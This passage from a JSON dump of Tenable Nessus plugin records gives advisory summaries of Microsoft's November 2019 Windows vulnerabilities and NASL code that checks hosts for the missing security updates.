an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411, CVE-2019-1432)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1434)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists in\n Windows Adobe Type Manager Font Driver (ATMFD.dll) when\n it fails to properly handle objects in memory. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2019-1412)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2019-1392)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_4525243.NASL", "href": "https://www.tenable.com/plugins/nessus/130909", "published": "2019-11-12T00:00:00", "title": "KB4525250: Windows 8.1 and Windows Server 2012 R2 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130909);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/12/30\");\n\n script_cve_id(\n \"CVE-2018-12207\",\n \"CVE-2019-0712\",\n \"CVE-2019-0719\",\n \"CVE-2019-1380\",\n \"CVE-2019-1381\",\n \"CVE-2019-1382\",\n \"CVE-2019-1384\",\n \"CVE-2019-1388\",\n \"CVE-2019-1389\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1392\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1407\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1412\",\n \"CVE-2019-1415\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1422\",\n \"CVE-2019-1424\",\n \"CVE-2019-1429\",\n \"CVE-2019-1432\",\n \"CVE-2019-1433\",\n \"CVE-2019-1434\",\n \"CVE-2019-1435\",\n \"CVE-2019-1438\",\n \"CVE-2019-1439\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4525243\");\n script_xref(name:\"MSKB\", value:\"4525250\");\n script_xref(name:\"MSFT\", value:\"MS19-4525243\");\n script_xref(name:\"MSFT\", value:\"MS19-4525250\");\n\n script_name(english:\"KB4525250: Windows 8.1 and Windows Server 2012 R2 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4525250\nor cumulative update 4525243. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411, CVE-2019-1432)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1434)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists in\n Windows Adobe Type Manager Font Driver (ATMFD.dll) when\n it fails to properly handle objects in memory. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2019-1412)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2019-1392)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4525243/windows-8-1-kb4525243\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4525250/windows-8-1-kb4525250\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4525250 or Cumulative Update KB4525243.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1406\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4525243', '4525250');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4525243, 4525250])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T04:58:08", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4524570. \nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436, CVE-2019-1440)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A remote code execution vulnerability exists when\n Windows Media Foundation improperly parses specially\n crafted QuickTime media files. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. Users whose accounts\n are configured to have fewer user rights on the system\n could be less impacted than users who operate with\n administrative user rights. (CVE-2019-1430)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles IPv6 flowlabel\n filled in packets. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1324)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1397, CVE-2019-1398)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-0719, CVE-2019-0721)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - An elevation of privilege vulnerability exists in the\n way that the StartTileData.dll handles file creation in\n protected locations. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1423)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712, CVE-2019-1309, CVE-2019-1310)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1417)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1433, CVE-2019-1435, CVE-2019-1437,\n CVE-2019-1438)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An elevation of privilege vulnerability exists due to a\n race condition in Windows Subsystem for Linux. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1416)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2019-1385)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_4524570.NASL", "href": "https://www.tenable.com/plugins/nessus/130902", "published": "2019-11-12T00:00:00", "title": "KB4524570: Windows 10 Version 1903 and Windows 10 Version 1909 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130902);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2020/02/14\");\n\n script_cve_id(\n \"CVE-2018-12207\",\n \"CVE-2019-0712\",\n 